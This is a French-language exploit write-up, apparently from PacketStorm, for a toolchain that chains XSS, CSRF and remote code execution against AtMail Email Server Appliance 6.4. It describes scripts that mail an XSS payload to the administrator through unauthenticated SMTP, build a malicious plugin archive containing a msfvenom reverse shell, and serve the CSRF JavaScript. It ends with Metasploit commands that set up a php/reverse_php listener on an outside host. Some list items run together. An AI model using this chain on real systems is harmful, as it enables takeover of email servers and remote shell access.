
AtMail Email Server Appliance 6.4 - Chaîne d'outils d'exploitation (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
Avertissement : cette chaîne d'outils d'exploitation a été inspirée par EDB-ID 20009.
L'objectif de cette chaîne d'outils d'exploitation est de remplacer EDB-ID 20009.
Avantages de cette chaîne d'outils par rapport à l'exploit EDB-ID 20009 :
Inconvénients de l'exploit EDB-ID 20009 :
msfvenom pour la génération du reverse shell)Installer les prérequis sur ArchLinux :
$ sudo pacman -S metasploit tar ruby
Fichiers de l'exploit :
config.yml contient la configuration de la chaîne d'outilsexploit.sh le wrapper de l'exploit qui doit être exécutéxss_mail.rb enverra l'email contenant le XSS à l'administrateur via le serveur SMTP d'Atmail (sans authentification).csrf_prepare.rb préparera la charge utile CSRF (définition de la cible et encodage de l'archive du plugin)rce_prepare.rb préparera le RCE (génération du reverse shell et création de l'archive du plugin)csrf_plugin.js la charge utile CSRF préparéenoraj/ dossier contenant l'architecture non compressée du pluginLa chaîne d'outils d'exploitation ne nécessite que 2 étapes manuelles :
config.ymlexploit.shMais avant de lancer l'attaque, un serveur web doit délivrer le fichier JavaScript CSRF et un listener de reverse shell doit attendre la connexion. L'attaque ressemblera donc davantage à :
config.ymlcsrf_plugin.jsexploit.shExemple de serveur HTTP sur une ligne :
$ ruby -run -e httpd . -p 8000
Exemple de listener de reverse shell :
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run